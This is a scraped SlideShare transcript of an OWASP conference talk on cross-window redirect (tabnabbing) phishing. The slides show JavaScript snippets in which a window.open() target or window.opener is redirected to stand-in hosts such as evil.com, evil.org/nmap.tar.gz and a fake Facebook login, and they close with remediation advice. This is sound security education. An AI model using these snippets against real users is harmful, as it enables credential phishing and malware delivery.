Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

The Cross Window redirect

2,652 views

Published on

A talk Khaled and myself gave at an Owasp conference 2015 in Doha, Qatar. This explains the cross window redirect "vulnerability" which allows phishers to redirect other browser tabs/windows.

Published in: Technology

The Cross Window redirect

  1. 1. Cross Window Redirect Khaled Hawasli Michael Hendrickx
  2. 2. Who are we? • Khaled Hawasli – Manager Security Analysis @ HelpAG • Michael Hendrickx – Security Analyst @ HelpAG
  3. 3. Preface • Social Engineering becomes more sophisticated • People don’t fall for the “click here” trick – Receive email with link – Click link – Presented with login screen
  4. 4. Old tricks • www.facebook.com
  5. 5. Cross-Window Redirect • Exploiting opened windows using JS • Unknowingly hyperlink redirections • Works on all browsers • 2 Variants: – Child window redirect – Parent window redirect
  6. 6. Child window redirect • Control the link you just opened Opens Gmail with window.open() Redirect to fake phishing page Parent Window The attackers site (controlling window) Child Window The targeted site (controlled window) childWindow = window.open(‘https://mail.google.com’); childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’; 1 2
  7. 7. X-windows redirect demo • Let’s get malware to users – Let’s watch a movie – We need a movie player http://michaelhendrickx.com/misc/sf.html
  8. 8. X-windows redirect explained • Link to SF to download software – Rewrite the link before the countdown  sf = window.open(‘http://sourceforge.net/...’); setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’; }, 4000);
  9. 9. Multiple ways to attack this: • setTimeout(): – Wait for a while and redirect the page. • Interactive(): – Server polling using XHR – Attacker can flip page on demand • HTML5 Visibility API: – Flip page when user is not looking https://github.com/ndrix/xwindow-redirect
  10. 10. Parent Window Redirect • “Evil child” can control the parent 1 Opens website with window.open() Child redirects the parent Parent Window The targeted site (controlled window) Child Window The (co window.open(‘http://mywebsite.com’); window.opener = ‘http://evil.com/gmail/login.php’;
  11. 11. Parent window redirect: demo • Emirates has some crazy deals! (Click Facebook message)
  12. 12. Parent window redirect: demo • Emirates has some crazy deals! <!DOCTYPE html> <head><title>Crazy deals from Emirates.com</title></head> <body> <img src="ek.jpg"/> <script> window.opener.location = 'http://fakefacebook.com’; window.location = 'http://www.emirates.com/ae/…'; </script> </body> </html>
  13. 13. Parent window redirect: demo • User may spend long enough on the target site, believing that Facebook timed out. Parent Window Child Window1. open child with window.open() 2. Redirect facebook to fake “session logged out” 3. refresh itself to legitimate site
  14. 14. Other sites that use window.open() • Facebook, Amazon widget, … • GMail schema.org
  15. 15. Remediation • Don’t use window.open() to open hyperlinks – Those links may control your page • Verify if your page was opened from another page – if(window.opener && !window.opener.closed){ ... } • Preferably, browsers should use X-Frame- Options header for these JS links
  16. 16. Thank you! Any questions?

×